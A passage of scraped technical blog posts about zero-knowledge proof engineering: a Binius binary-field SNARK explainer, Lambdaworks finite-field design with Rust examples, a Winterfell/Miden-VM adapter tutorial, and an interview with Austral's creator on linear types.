There is still ongoing work on multivariate polynomials (PR-726</a>, the Sumcheck Protocol (PR-739</a>), inner product arguments (PR-743</a>), adding BN254 elliptic curve (PR-646</a>) and an adapter for Circom (PR-752</a>).</p>
Hacking in Buenos Aires and visiting friends abroad</h2>
During the first weeks of December, we hosted an event and hacking house in Buenos Aires, where we received many engineers, researchers, and friends. It was a great opportunity to meet in person, discuss on cryptography, distributed systems, and engineering, and have a good time. We also had the opportunity to visit several landmarks in the city and outskirts, enjoy asados and dinners, as well as a short trip to the city of Bariloche.</p>
We also met with many bootcampers in several events we participated, such as DevConnect at Istanbul or ZK Summit.</p>
Next steps</h2>
We have greatly enjoyed the whole experience and are grateful to our bootcampers for their commitment and hard work. We have learned a lot from them and the experience, and this will help us improve our hacking learning path to cryptography and zero-knowledge proofs. We will take more time to analyze the whole experience and we will be releasing new blog posts on different proof systems and how to use the different tools and features in Lambdaworks.</p>


SNARKs on binary fields: Binius - Part 2
Unknown — Fri, 05 Jan 2024 00:00:00 +0000
Introduction</h2>
This post is a continuation of our discussion on Binius</a>, a new proof system that works over binary fields. Before continuing, see the first part</a> if you are unfamiliar with some of the concepts or our post</a> on why we think this proof system can help move the industry forward.</p>
In this part, we will focus on the concatenated codes (which will allow us to extend the polynomial commitment scheme for small fields) and the different protocols to check statements over multivariate polynomials.</p>
Concatenated Codes</h2>
In our previous post, we covered the polynomial commitment scheme for small fields. To develop the general commitment scheme, we first need to introduce the packing scheme and concatenated codes. Remember that in this setting we are working with a tower of fields, $\tau_0 \subset \tau_1 \subset \dots \subset \tau_t$. We work with a $[n_0 , k_0 , d_0]$ linear outer code with a $[n_i , k_i , d_i]$ linear inner code. The outer code works over $\tau_{i + k}$, while the inner code works over $\tau_i$.</p>
The whole construction depends on packing several elements from a field, and interpreting them as elements from an extension field. We can view $2^k$ elements from $\tau_i$ as a single element from $\tau_{i + k}$ (we can view it as a $\tau_i$ vector space, as we can see the complex numbers as a two dimensional vector space over the real numbers).</p>
The concatenated code’s encoding procedure works as follows:</p>
    1. Pack the initial message over $\tau_i$ into elements of $\tau_{i+k}$. For example, we have four bit variables from $\tau_0$, $0, 1, 1, 1$ and we can group then as an element $0111$ from $\tau_2$.</span></span>
    2. Encode the packed message using the outer code. For example, we can use Reed-Solomon encoding.</span></span>
    3. Unpack each symbol in the codeword into a message over $\tau_i$.</span></span>
    4. Encode using the inner code and concatenate the elements. This encoding may be the trivial one, that is, applying the identity code.</span></span></code></pre>
One problem we face is that we have to use the extension code. We have an interplay between different fields: the field representing the coefficients of the polynomial, the field for the alphabet of the code, the intermediate field and the extension field which we use for cryptographic security (here, $\tau_t$). To work with the extension code, we define a structure containing elements from $\tau_i$ in a rectangular array (of $2^{\tau - i} \times 2^k$ elements). Each row contains $2^k$ elements, which can be interpreted as a $\tau_{i + k}$ element. Analogously, the $2^{\tau - i}$ elements in a column can be interpreted as a single element in $\tau_t$. The structure has a dual view: as a vector space over $\tau_t$ of dimension $2^k$ (viewing the columns) or as a vector space over $\tau_{i + k}$ of dimension $2^{t - i}$. Multiplication of the array by an element from $\tau_i$ is interpreted as multiplication elementwise. If we want to multiply by an element over $\tau_t$, we take each column (which is a single element from $\tau_t$) and perform the multiplication of each column by the element. In an analogous way, we can multiply by an element in $\tau_{i + k}$ by multiplying each row.</p>
The block level encoding-based polynomial commitment scheme’s procedure is:</p>
    1. Commit($p$): Arrange the coefficients of the polynomial into an $m_0 \times m_1$ matrix, with entries in $\tau_i$. Group the elements taking chunks of $2^\kappa$ and interpret them as elements in $\tau_{i + k}$ and apply the extended encoding row-wise, obtaining a matrix of size $m_0 \times n$ with elements over $\tau_\tau$. Build a Merkle tree from the columns and output the root as commitment.</span></span>
    2. Prove($p$,$s$): The prover arranges the coefficients into an $m_0 \times m_1$ matrix $t$ with entries in $\tau_i$. He computes and sends in the clear $t^\prime = \otimes_{ i = l_1 }^\ell (1 - r_i , r_i ) . T$ to the verifier. The verifier samples $\rho$ indexes $j_0 , j_1 , ... j_{\rho - 1}$. The prover sends the columns of the encoded matrix $U$ with their accompanying Merkle paths.</span></span>
    3. Verify($\pi , r , s$): The verifier checks that $t^\prime \otimes_{ i = 0}^{l_1} .(1 - r_i , r_i ) = s$. Then, the verifier interprets $t^\prime$ as chunks of size $2^k$ and applies the extended code, unpacking all the elements to get $u^\prime$. The verifier checks that all the columns supplied are included in the Merkle tree, and checks that $\otimes_{ i = l_1 }^\ell ( 1 - r_i , r_i ).u$.</span></span></code></pre>
The size of the proof can be calculated from $t^\prime$ ($m_1$ elements from $\tau_t$), the columns (consisting of $\rho m_0$ elements from $\tau_{i + k}$) plus the authentication paths for the $\rho$ columns. Assuming a digest size of $256$ bits, we have $2^\tau m_1 + 2^{i + k} \rho m_0 + 2^8 \rho \log_2 {n}$ bits.</p>
Protocols</h2>
Binius contains a list of key polynomial predicates, based on those proposed by HyperPlonk</a>:</p>
    1. Query</span></span>
    2. Sum</span></span>
    3. Zero</span></span>
    4. Product</span></span>
    5. Multiset</span></span>
    6. Permutation</span></span>
    7. LookUp</span></span></code></pre>
Almost all of the protocols boil down to a sumcheck. For the basics of the sumcheck protocol, see our previous post</a> or Thaler’s book</a>.</p>
The zerocheck protocol is useful, for example, to prove that the gate constraints are enforced in HyperPlonk. In that protocol, we have a multilinear polynomial $M$ (which encodes the trace) and selector multilinear polynomials $S_1$, $S_2$, $S_3$, such that, for every point in ${0, 1 }^n$, we have

$0 = S_1 (M_0 + M_1 ) + S_2 M_0 M_1 + S_3 G(M_0 ,M_1 ) - M_2 + I$

where $M_0 (x) = M(0,0,x)$, $M_1 (x) = M(0,1,x)$, and $M_2 (x) = M(1,0,x)$.</p>
How can we prove that the multivariate polynomial, $P = S_1 (M_0 + M_1 ) + S_2 M_0 M_1 + S_3 G(M_0 ,M_1 ) - M_2 + I$ is equal to zero for every value in ${0, 1 }^n$ ? We let the verifier supply a random point $r_{zc}$ from $\mathbb{F}^n$ and build the multivariate polynomial

$P^\prime (x) = eq(r_{zc} , x) P(x)$

with $eq(x,y) = \prod ( x_i y_i + (1 - x_i ) (1 - y_i ))$ and we run the sumcheck protocol for $P^\prime (x)$, using as sum value $0$. The verifier will only need to do one evaluation of $P^\prime (x)$ at $x = r_{s}$.</p>
The use of the sumcheck with $P^\prime (x)$ involves multivariate polynomials which are not multilinear; this means that the prover has to send at each round a polynomial of at most degree $d$. HyperPlonk has an optimization for this case: the prover sends a commitment to a univariate polynomial of degree at most $d$ and provides an evaluation at a single point (instead of at least 3 points).</p>
Since most of the protocols end up in a sumcheck, we can batch the polynomials using a random linear combination and reduce all the checks to a single sumcheck. Binius’s repo</a> contains the implementation of the zero, sum and evaluation checks.</p>
Binius proposes the use of Plonkish arithmetization; the main difference with HyperPlonk lies in the fact that the trace contains elements belonging to different subfields. Therefore, the gate constraints will express relations over different subfields. An execution is valid if</p>
    1. All gate constraints hold.</span></span>
    2. All global copy constraints are satisfied.</span></span>
    3. Every witness variable lies inside its prescribed subfield.</span></span></code></pre>
The first two conditions hold for any of the variants of Plonk; the last one is introduced because we work with extension towers.</p>
Conclusions</h2>
In this post, we covered how the commitment scheme developed in the first part is extended to work with packed fields. We can view arrays of field elements in a dual way, packing the elements column or row-wise. The paper later presents some key protocols to prove predicates over polynomials, such as evaluation, sum and product check; these boil down to doing several sumchecks, which can be batched conveniently. These, together with some arithmetization scheme (such as Plonkish) can be used to yield a SNARK. Tha main difference between HyperPlonk and Binius lies in the fact that the trace elements in Binius may belong to different subfields. However, this does not add a new check. Rather, this could replace what could be additional checks in HyperPlonk. These subfield checks are guaranteed by the security property of the small-field polynomial commitment scheme.</p>


Lambdaworks Design and Usage: Part 1 - Finite Fields
Unknown — Tue, 02 Jan 2024 00:00:00 +0000
Introduction</h2>
In this series of blog posts, we will see how Lambdaworks is implemented and the standard tools needed to develop provers. This first part will briefly overview the library and then focus on the finite field design and usage.</p>
Lambdaworks at its core is a library to create proving systems, and a collection of associated provers and verifiers ready to use. In this blog post, we will explore the building blocks of the proving systems and the Lambdaworks library.</p>
The most relevant sections of the library are:</p>
    * Math</span></span>
    * Crypto</span></span>
    * Provers</span></span></code></pre>
Provers has a collection of proof systems. Crypto contains some primitives like MSM, hashes, and Merkle trees. Math has logic related to finite fields and elliptic curves.</p>
Math</h2>
At the core of the Math library are finite fields, the main building block of all the constructions we use in Lambdaworks.</p>
The basic structure is designed under a relationship between a Field</code> and its FieldElement</code>. Let’s see how it works.</p>
Field and Elements: Main Ideas</h3>
A Field</code> is an abstract definition. It knows the modulus and defines how the operations are performed.</p>
We usually create a new Field</code> by instantiating an optimized backend. For example, this is the definition of the Pallas field:</p>
// 4 is the number of 64-bit limbs needed to represent the field</span></span>
type PallasMontgomeryBackendPrimeField<T> = MontgomeryBackendPrimeField<T, 4>;</span></span>
</span>
#[derive(Debug, Clone, PartialEq, Eq)]</span></span>
pub struct MontgomeryConfigPallas255PrimeField;</span></span>
impl IsModulus<U256> for MontgomeryConfigPallas255PrimeField {</span></span>
    const MODULUS: U256 = U256::from_hex_unchecked(</span></span>
        "40000000000000000000000000000000224698fc094cf91b992d30ed00000001",</span></span>
    );</span></span>
}</span></span>
</span>
pub type Pallas255PrimeField =</span></span>
    PallasMontgomeryBackendPrimeField<MontgomeryConfigPallas255PrimeField>;</span></span></code></pre>
As it can be seen, it is enough to define its modulus and instantiate it over a PallasMontgomeryBackendPrimeField</code>.</p>
Internally, it resolves all the constants needed and creates all the required operations for the field. Notice that there are no macros involved. This holds for all the Lambdaworks code.</p>
Generics and traits are the only tools used to have genericity. This makes the job easier for the compiler to suggest possible functions to be called and makes the code easier to understand. Moreover, minimal traits are used to make the code easier to understand.</p>
Back to the fields, you will notice that other backends can be more efficient for some fields. For example, Mersenne31 and Goldilocks are defined over their backend.</p>
Back to the usage, suppose we want to create a FieldElement</code>. This is as easy as instantiating the FieldElement</code> over a Field</code> and calling a from_hex</code> function.</p>
For example:</p>
let an_element = FieldElement::<Stark252PrimeField>::from_hex_unchecked("030e480bed5fe53fa909cc0f8c4d99b8f9f2c016be4c41e13a4848797979c662")</span></span></code></pre>
Notice we can alias the FieldElement</code> to something like</p>
type FE = FieldElement::<Stark252PrimeField>;</span></span></code></pre>
if we want to shorten the code and do not care about being explicit with the field.</p>
Once we have a field, we can make all the operations. We usually suggest working with references, but copies work too.</p>
let field_a = FE::from_hex("3").unwrap();</span></span>
let field_b = FE::from_hex("7").unwrap();</span></span>
</span>
// We can use pointers to avoid copying the values internally</span></span>
let operation_result = &field_a * &field_b</span></span>
</span>
// But all the combinations of pointers and values works</span></span>
let operation_result = field_a * field_b</span></span></code></pre>
Sometimes, optimized operations are preferred. For example,</p>
// We can make a square multiplying two numbers</span></span>
let squared = field_a * field_a;</span></span>
// Using exponentiation</span></span>
let squared = </span></span>
field_a.pow(FE::from_hex("2").unwrap())</span></span>
// Or using an optimized function</span></span>
let squared = field_a.square()</span></span></code></pre>
all compute the square of a number, but performance-wise, there is quite a big difference.</p>
Some useful instantiation methods are also provided for common constants and whenever const functions can be called. This is when creating functions that do not rely on the IsField</code> trait since Rust does not support const functions in traits yet,</p>
// Defined for all field elements</span></span>
// Efficient, but nonconst for the compiler</span></span>
let zero = FE::zero() </span></span>
let one = FE::one()</span></span>
</span>
// Const alternatives of the functions are provided, </span></span>
// But the backend needs to be known at compile time. </span></span>
// This requires adding a where clause to the function</span></span>
</span>
let zero = F::ZERO</span></span>
let one = F::ONE</span></span>
let const_intstantiated = FE::from_hex_unchecked("A1B2C3");</span></span></code></pre>
For many use cases, we can treat these fields as a PrimeField</code> instead of treating them as a Field</code>. If the word FieldExtension</code> is irrelevant, PrimeField</code> is the right choice.</p>
You will notice traits are followed by an Is</code>, so instead of accepting something of the form IsField</code>, you can use IsPrimeField</code> and access more functions. The most relevant is .representative()</code>. This function returns a canonical representation of the element as a number, not a field.</p>
If the internal number is in Montgomery form, this function will reverse it.</p>
This allows us to make comparisons where it makes sense. Since fields work like circular lists of elements, order doesn’t make much sense.</p>
If we are in $\mathbb{F_3}$, for example, $4$ may look bigger than $2$, but $4$ is also $1$, and $1$ seems smaller than $2$. The question of “which element is bigger” doesn’t make much sense. This gets even messier if we interpret some numbers as negatives as other libraries.</p>
For this reason, comparisons are only allowed when we interpret the FieldElement</code> as a number through the representative()</code> function.</p>
Field and Elements: Serialization and Deserialization</h3>
For serialization, we recommend using Serde with bincode. This has given the best results all around while maintaining good usability. By default, the serialization is done in the most compact mode possible and is not human-readable.</p>
To enable a human-readable serialization, where fields are written as strings, the feature lambdaworks-serde-string</code> can be enabled.</p>
Serde is available at all levels of the library. So, if you have a FieldElements struct, you can simply derive a serialization.</p>
FieldElements</code> also have different algorithms to transform into bytes in the ByteConversion</code> trait. This is a from_bytes_le</code>, from_bytes_be</code>, to_bytes_le</code> and to_bytes_be</code>.</p>
These smaller conversions to bytes are helpful when doing small tasks like appending data to a transcript but can become cumbersome when you have to serialize complex structures.</p>
Field and Elements: Advanced usage, Extensions, and Internals deep dive</h3>
Field extensions are used in two scenarios requiring slightly different properties: pairing computations and working with small fields with proof systems.</p>
Pairings</h4>
When doing pairings, a degree $12$ extension is commonly used. This extension is usually created with a tower of extensions, where we make a degree $2$ extension of a degree $2$ extension of a degree $3$ extension. This is a non-naïve of making a degree $12$ extension.</p>
For example, we can see on the code:</p>
pub type Degree12ExtensionField = QuadraticExtensionField<Degree6ExtensionField, LevelThreeResidue>;</span></span>
</span>
pub type Degree6ExtensionField = CubicExtensionField<Degree2ExtensionField, LevelTwoResidue>;</span></span></code></pre>
Using quadratic and cubic extensions, we are building the tower of fields. The key design for this to work is in the internal structure of the IsField</code>. A field internally has a BaseType</code> that, in practice, can either be a BigInteger, which we call UnsignedInteger</code> to enable multiple backends of BigInts, or another FieldElement.</code></p>
This works nicely for this scenario, but there is another to handle.</p>
Working with smaller fields</h4>
When working with proving systems that use small fields, like it could be a Stark with a 32-bit BabyBear, we need an extension to avoid security being broken. This is because we need to sample a random challenge from a much larger set than the degree of the polynomials involved. We will also use an extension to sample random challenges from a bigger set in this case.</p>
But this time, the critical issue is that we will be doing a lot of operations between the field and its subfield. These operations can be solved more efficiently than just doing them naïvely. Think of it as multiplying a complex number for a real one when needed instead of constantly multiplying complex numbers even when the imaginary part is 0.</p>
We define each Field</code> as a SubField</code> of another Field</code> to solve this issue. For an unextended field, we define it as a subfield of itself, which is a true statement that you will not notice. When working with an extension, two sets of operations are defined—one for the field and one for the field against its subfield.</p>
The resolution of which operation to use is done with the type system, and so these optimizations are invisible when using the library. When using an operator, Lambdaworks picks the correct operation by itself.</p>
Conclusion</h2>
Finite Fields are at the core of many proving systems, and having optimized backends is necessary for performance. Lambdaworks has developed its own backend, emphasizing performance and usability. The library also has other features, such as cryptographic primitives and different proof systems. In future blog posts, we will cover these parts, show how to use them, and explain some of the design decisions and the advantages that they may offer.</p>


Lambdaworks as a drop-in replacement for Winterfell to prove the Miden-VM
Unknown — Wed, 27 Dec 2023 00:00:00 +0000
Introduction</h2>
Lambdaworks</a> is our library for finite fields, elliptic curves, and proof systems. Among them, we have a STARK</a>, Plonk</a>, Groth 16</a> provers and we are on the way to having a fully compatible Cairo prover using STARKs</a>. We want to continue adding new proof systems and polynomial commitment schemes so that users have a library suited to their particular needs and where experimentation is easy.</p>
During the last months, we have been working towards compatibility with Winterfell</a>, a popular general-purpose STARK prover. Polygon uses Winterfell to prove the execution of the Miden-VM</a>, which is a ZK-friendly VM to enable features and benefits that EVM-based L1s and L2s do not currently offer.</p>
Even though the main components are the same, such as execution trace, auxiliary trace, using Merkle trees for commitments, and the FRI protocol, there are some parts where it was not straightforward to use Lambdaworks as a drop-in replacement for Winterfell. One obstacle is related to the field backend. Miden was designed to work over the prime $2^{64} - 2^{32} + 1$ (known by some as Mini-Goldilocks) and has to deal with extension fields to achieve cryptographic security, whereas our STARK prover worked with a 252-bit field. In this first part, we focused purely on compatibility and left behind optimizations that we could add to improve the performance.</p>
In this post, we will cover the major work we have been doing toward compatibility with Winterfell so that you can replace it in your project if needed. This adds redundancy and robustness since we have different provers with different design choices and can help detect bugs.</p>
Fields and Traces</h2>
To work with Winterfell, we implemented the field trait from Lambdaworks to the native fields of Winterfell. In other words, we are running our STARK prover with Winterfell fields.</p>
Since Miden works with mini-Goldilocks, the auxiliary trace and the random challenges drawn from the verifier belong to a field extension. One easy way to deal with this is by having all the elements belong to the extension field, which would add overhead to the elements of the main trace (since they live in the smaller base field).</p>
To solve this issue, we split the trace in two, with one part belonging to the main trace and using the small field and the extension belonging to the larger field.</p>
Moreover, we added some useful generalizations. Since, a lot of times, elements from the extension field are multiplied by elements belonging to the base field, the operation can be improved. This is similar to what we do, for example, in the complex numbers when we multiply it by a real. If we want to compute $2\times (1 + i)$, we distribute and do two multiplications instead of doing a naive multiplication with the formula $(2 + 0i) \times (1 + i)$).</p>
To handle this case, we implemented the subfield logic</a>. This allows us to define the operations between field elements and exceptional cases for when a subfield element operates with its parent field element. And since it’s just a matter of picking the correct operation in compilation time, there is no overhead. All this extra logic adds no overhead to the fields, as it can be measured in our benchmarks.</p>
Along with the changes in the fields, we also introduced changes to the FFT so that it works over extension fields</a>. Now, the interpolation of the auxiliary trace and computation of the composition polynomial has to work over larger fields.</p>
Winterfell adapter</h2>
The Winterfell Adapter transforms a Winterfell AIR (algebraic intermediate representation) into a Lambdaworks AIR.</p>
Internally, it creates a new implementation of the Air trait, using all the configurations from Winterfell. One detail is that the evaluation of constraints is delegated here to the implementation in Winterfell to avoid a redefinition that would take longer for someone who already has the Air defined in Winterfell.</p>
To see it working, we can check the following link, which contains an example of how to generate proof for the Fibonacci AIR</a>. Let’s check it.</p>
Code and Examples</h3>
Let’s see how the Winterfell adapter is used with a simple Air.</p>
Fibonacci Air</h4>
Suppose you want to run Lambdaworks prover with a WinterfellFibonacciAIR.</code></p>
use winterfell::Air;</span></span>
</span>
struct WinterfellFibonacciAIR {</span></span>
    /// ...</span></span>
}</span></span>
</span>
impl Air for WinterfellFibonacciAIR {</span></span>
    /// ...</span></span>
}</span></span></code></pre>Step 1: Convert your Winterfell trace table</h5>
Use the Lambdaworks AirAdapter</code> to convert your Winterfell trace:</p>
let trace = &AirAdapter::convert_winterfell_trace_table(winterfell_trace)</span></span></code></pre>Step 2: Convert your public inputs</h5>
Create the AirAdapterPublicInputs</code> by supplying your winterfell_public_inputs</code> and the additional parameters required by the Lambdaworks prover:</p>
let pub_inputs = AirAdapterPublicInputs {</span></span>
    winterfell_public_inputs: AdapterFieldElement(trace.columns()[1][7]),</span></span>
    transition_degrees: vec![1, 1],    /// The degrees of each transition</span></span>
    transition_exemptions: vec![1, 1], /// The steps at the end where the transitions do not apply.</span></span>
    transition_offsets: vec![0, 1],    /// The size of the frame. This is probably [0, 1] for every Winterfell AIR.</span></span>
    composition_poly_degree_bound: 8,  /// A bound over the composition degree polynomial is used for choosing the number of parts for H(x).</span></span>
    trace_info: TraceInfo::new(2, 8),  /// Your winterfell trace info.</span></span>
};</span></span></code></pre>
Note that you might have to also convert your field elements to AdapterFieldElement,</code> as in this case.</p>
Step 3: Make the proof</h5>
let proof = Prover::prove::<AirAdapter<FibonacciAIR, TraceTable<_>>>(</span></span>
    &trace,</span></span>
    &pub_inputs, /// Public inputs</span></span>
    &proof_options,</span></span>
    StoneProverTranscript::new(&[]),</span></span>
);</span></span></code></pre>
TraceTable</code> is the Winterfell type that represents your trace table. You can see the examples</code> folder inside this crate to check more examples.</p>
Miden Air</h3>
Let’s see how it is used with an actual Miden AIR and program.</p>
First, we must compile and run the code to generate a trace. This is done in the same manner as Miden does it.</p>
The whole code is a bit long, but it starts like this:</p>
let fibonacci_number = 16;</span></span>
        let program = format!(</span></span>
            "begin</span></span>
                repeat.{}</span></span>
                    swap dup.1 add</span></span>
                end</span></span>
            end",</span></span>
            fibonacci_number - 1</span></span>
        );</span></span>
let program = Assembler::default().compile(program).unwrap();</span></span>
... </span></span>
// Some more code goes in the middle until we generate the trace</span></span>
</span>
let winter_trace = processor::execute(</span></span>
    &program,</span></span>
    stack_inputs.clone(),</span></span>
    DefaultHost::default(),</span></span>
    *ProvingOptions::default().execution_options(),)</span></span></code></pre>
After generating the trace from Miden, the real work for the prover starts. But the code is not that different from the Fibonacci case; it just has a more complex AIR, but the user is abstracted from that.</p>
To generate the proof, we run the following code:</p>
let pub_inputs = AirAdapterPublicInputs {</span></span>
    winterfell_public_inputs: pub_inputs,</span></span>
    transition_exemptions: vec![2; 182],</span></span>
    transition_offsets: vec![0, 1],</span></span>
    trace_info: winter_trace.get_info(),</span></span>
    metadata: winter_trace.clone().into(),</span></span>
};</span></span>
</span>
let trace =</span></span>
    MidenVMQuadFeltAir::convert_winterfell_trace_table(winter_trace.main_segment().clone());</span></span>
</span>
let proof = Prover::<MidenVMQuadFeltAir>::prove(</span></span>
    &trace,</span></span>
    &pub_inputs,</span></span>
    &lambda_proof_options,</span></span>
    QuadFeltTranscript::new(&[]),</span></span>
)</span></span>
.unwrap();</span></span></code></pre>
Finally, to verify it, it is enough to call the verify function with the proof and the public inputs:</p>
Verifier::<MidenVMQuadFeltAir>::verify(</span></span>
            &proof,</span></span>
            &pub_inputs,</span></span>
            &lambda_proof_options,</span></span>
            QuadFeltTranscript::new(&[]),</span></span>
        )</span></span></code></pre>Benchmarks</h3>
To run the Fibonacci Miden benchmark run:</p>
cargo bench</span></span></code></pre>
To run it with parallelization, run:</p>
cargo bench --features stark-platinum-prover/parallel,winter-prover/concurrent</span></span></code></pre>
Several PRs added support for extension fields for the prover and verifier (716</a>, 717</a> and 724</a>). These allow us to represent the trace in the base field (which has faster operations and less memory use) and have a different frame for the auxiliary trace over the extension. There were some modifications in the constraint calculations, such as being able to use different fields.</p>
There is also a Miden adapter</a> containing some example tests, such as Fibonacci and readme example.</p>
Adding periodic columns</h2>
Winterfell also uses periodic columns, so we had to add them and test their use in this PR</a>. These have uses for hash function calculations or supporting constants that we need.</p>
Conclusions</h2>
Lambdaworks has been growing over the last year. We have added several proof systems and commitment schemes to give users an easy-to-use library to experiment with and build applications. We have also been working to make the provers compatible with our libraries, giving the users a drop-in replacement. We decided to work towards compatibility with Winterfell/Miden VM since we like many design choices and the work done to generalize AIRs in AIRscript</a>. We will continue improving the performance of our provers and supporting new proof systems as part of our roadmap.</p>


Interview with Fernando Borretti about Austral - a systems programming language with linear types
Unknown — Sun, 24 Dec 2023 00:00:00 +0000
Introduction</h2>
It has been many moons since we interviewed a language creator, and are very excited to present a few questions to and share the answers from Fernando Borretti, the creator of the Austral</a> (Github</a>) language. As it says on the tin:</p>

“Austral</strong>  is a new systems programming language. It uses linear types to provide memory safety and capability-secure code</a>, and is designed to be simple enough to be understood by a single person, with a focus on readability, maintainability, and modularity.”</p>
</blockquote>
Just as Pascal introduced modules, and Lisp garbage collection, to a generation of programmers; Rust introduced using the type system to enforce rules on resource usage into the mainstream</em>.</p>
It has sparked a very interesting and ongoing discussion about memory usage, resource handling, and linear type systems which are inspiring many other languages. We ourselves at Lambda hope to present our own take on this in the future.</p>
Without further ado, here is the interview.</p>
Why did you create Austral? Doesn’t Rust solve the same type of problems?</strong></p>
I think it was Manuel Simoni who said: the most important thing about a programming language is how it makes you feel.</p>
And to many people that sounds like a joke but I take it very seriously. Programming language design is an affective thing. I stopped working with Python because it made me feel like I was always standing atop a house of cards in a strong wind. It made me feel anxious. JavaScript is a lot like that.</p>
There’s something akin to the extended phenotype in biology for programming languages: beyond the core language and the standard library you have the “extended language”, the tooling, the ecosystem, the community, the culture. And all of those things come together and define your experience of the language. Some languages like OCaml have a lot of technical merit, but the tooling is horrible and the community has no interest in improving, and so you persist in using it for its technical beauty and then inevitably burn out. And the further away from the core language you go, the less control there is (it’s hard to socially engineer an entire language community) but there’s a lot of things the language creators have control over, like setting the tone of the community, expectations around documentation, the quality of the tooling.</p>
I wanted a language (and an extended language) that I would feel happy using. I wanted a small, simple language. Simple in the sense of Kolmogorov complexity: it fits in your head and there’s not reams and reams of edge cases you need to understand it. I wanted a slow-moving, conservative language, in the spirit of Common Lisp, where code bitrots very very slowly and you can confidently write code today knowing it will compile and run in thirty or more years. And I want to build an extended language to support that: high quality tooling and high quality docs to set the tone and create a community where people value quality, taste, and craftsmanship.</p>
Re: Rust, I like Rust a lot. I work with it professionally. The tooling is a joy to use (after years of being tormented by pip and dune and pretty much everything else). And it’s infinitely better designed than most other languages you can find. I will even defend async.</p>
But Rust is a very pragmatic language, and the problem with pragmatism is that it never ends*. Pragmatism has no natural stopping point. Rust is already pretty complex and I expect it will continue to grow as people demand more from the language. And the thing about programming languages is you can’t really take features off. And this isn’t necessarily wrong: I don’t think Rust would be as successful if it didn’t have a thousand little ergonomic features, and certainly if it didn’t have async there’d be a lot less of an impetus to adopt it for building servers.</p>
There’s two ways to build a general-purpose language: one is to make it so that it is not specialized to any one thing, and that’s the Austral approach; and one is to make it specialized to every one thing. And things tend to evolve towards the latter, because large companies – the ones whose employees sit on the boards of programming language foundations, and the ones who pay people to work on the compilers and tooling and such – have very specific needs, and they’re always lobbying to have the language solve their specific problem. So languages grow and accumulate all these features because Google needs to reduce global latency by 0.02%.</p>
*Philip K. Dick originally said this of introspection, and he was right.</p>
Which languages inspired you the most?</strong></p>
Rust gets a lot of credit because it’s the only industrial language to have anything like linear types.</p>
Cyclone, which also inspired Rust, was a research language, a better dialect of C, didn’t take off but they published a few papers about it. There were very interesting ideas about region-based memory management there.</p>
Haskell for type classes done right. Haskell 98 type classes in particular are a jewel of good design. Standard ML for its module system. Ada for the syntax, module system, and ideas about security.</p>
What is a linear type system, why is it useful? What type of software do you think that can be improved by using a linear type system?</strong></p>
I’ve written a bit about this in different places:</p>
https://borretti.me/article/type-systems-memory-safety</a></p>
https://borretti.me/article/how-australs-linear-type-checker-works</a></p>
https://borretti.me/article/introducing-austral</a></p>
https://austral-lang.org/linear-types</a></p>
Part of me wants to consolidate these into one “definitive” explanation, but another part thinks it’s valuable to have different approaches to the same idea. So I have a number of different elevator pitches:</p>
One way to think about it is linear types let you enforce protocols at compile time. There’s two kinds of values in programming: plain data and protocol handles. The latter are things like sockets, file objects, database handles, IPC channels. In languages with manual memory management they include heap-allocated objects.</p>
These have to conform to a particular protocol, with the right state transitions. No double-free (you can’t free memory twice) and no use-after-free. Linear types allow you to enforce this at compile time. This is the main benefit: you get manual memory management with high performance and without safety footguns.</p>
But you can also make your own protocols for your own types and enforce higher-level API contracts than what a normal type system allows.</p>
Another way to think about it is that linear types make values work like real-world objects. In reality things can only ever be in one place. They move, but can’t be copied. In computers, copying is the primitive operation. Values can be aliased because pointers are unrestricted.</p>
It turns out a lot of the problems with mutation are really problems with aliasing. And when you restrict pointer aliasing through linear types, you get referential transparency with pervasive mutation. You get code that is easy to reason about and very high performance.</p>
As for what kinds of software could be improved: mainly, anything that manually-manages memory or uses external resources that need to respect protocols. That’s the main improvement. But when you start to think about designing APIs with linear types from the ground up, it becomes a lot more general, because a whole lot of APIs can be improved by using linear types to enforce high-level contracts and protocols.</p>
What are the disadvantages of using a linear type system? Do you think that developer experience or the learning curve are necessarily impacted?</strong></p>
There are two main disadvantages:</p>
    1. Explicitness and verbosity: you have to call destructors by hand, and a lot more things require destruction (e.g. any string).</span></span>
    2. Linear types are incompatible with traditional exception handling techniques: <https://borretti.me/article/linear-types-exceptions></span></span></code></pre>
Your post explaining the linearity checker details the implementation. Some modern languages are exploring implementing their type systems as rule sets in logic inference engines e.g. Datalog. Do you have thoughts on this trend?</strong></p>
I don’t know enough logic programming to implement the type checker in it. There’s this Racket tool called Redex which I’m aware of but haven’t played with, it basically lets you write typing judgments in Gentzen notation (like PLT papers) but have those judgements type-checked. Which is a vast improvement over writing the type system in LaTeX.</p>
Another thing is that the type system is not too complicated. The goal is to be simple in the C. A. R. Hoare sense of “simple enough that there are obviously no bugs”.</p>
Incremental compilation is also a hot topic today. In your post explaining the design of the Austral compiler you mention that for simplicity it does batch compilation. Have you considered incremental compilation an interesting feature or do you see it as an implementation detail?</strong></p>
Incremental and separate compilation are a must have in a production compiler but I think you can live without them in the early days, particularly because there’s just not that much code written in the language in the first place. You could take the entire ecosystem, 10x it in volume, and still not suffer from slow compile times.</p>
I think this is an area where there’s room for improvement relative to other languages like Rust, because in Austral the module is the compilation unit, while in Rust the crate is the compilation unit. In Rust, all the modules that make up a crate are loaded at once, and only then compiled, so you can have e.g. circular dependencies between modules within a crate. The problem is build times are the main complaint people have about Rust, and people have to turn to bad solutions like manually splitting codebases into multiple crates.</p>
In your introduction to Austral, you mention that type inference is an anti-feature. Can you expand on what led you to this decision?</strong></p>
I feel that type inference is a science experiment that broke its cage and escaped the lab, to the detriment of many people. As in, it should have remained an academic curiosity.</p>
The fundamental problem is that type inference doesn’t know whether the input you give it is correct or a mistake, but it will use it as a constraint in inference anyways. I had this problem in OCaml constantly: I’d make a mistake where in Java I’d get an error message saying “you made a mistake”, while in OCaml the compiler would make a best-effort inference, propagating my mistake upwards and sideways and every which way, and then I’d get an incomprehensible type error, sometimes many tens or hundreds of lines removed from the place where I made the actual mistake.Sometimes the only solution to such errors is to start adding type annotations (to function signatures, to variables) to constrain the inference process, and this can take a long time. And then you find the error and it was the most trivial thing, and in a less bigbrained language it would not have happened in the first place.</p>
The next problem is languages that infer too much. Again, in OCaml (and unlike Rust) you can leave the parameters to a function unannotated. You save microseconds of typing, and for the rest of the lifetime of that codebase you will spend multiple minutes trying to figure out what the type of something is. And you can say, well, simply annotate all your function signatures. But that’s why languages have to have hard rules: if something is optional, people will take the shortcut and not do it all the time.</p>
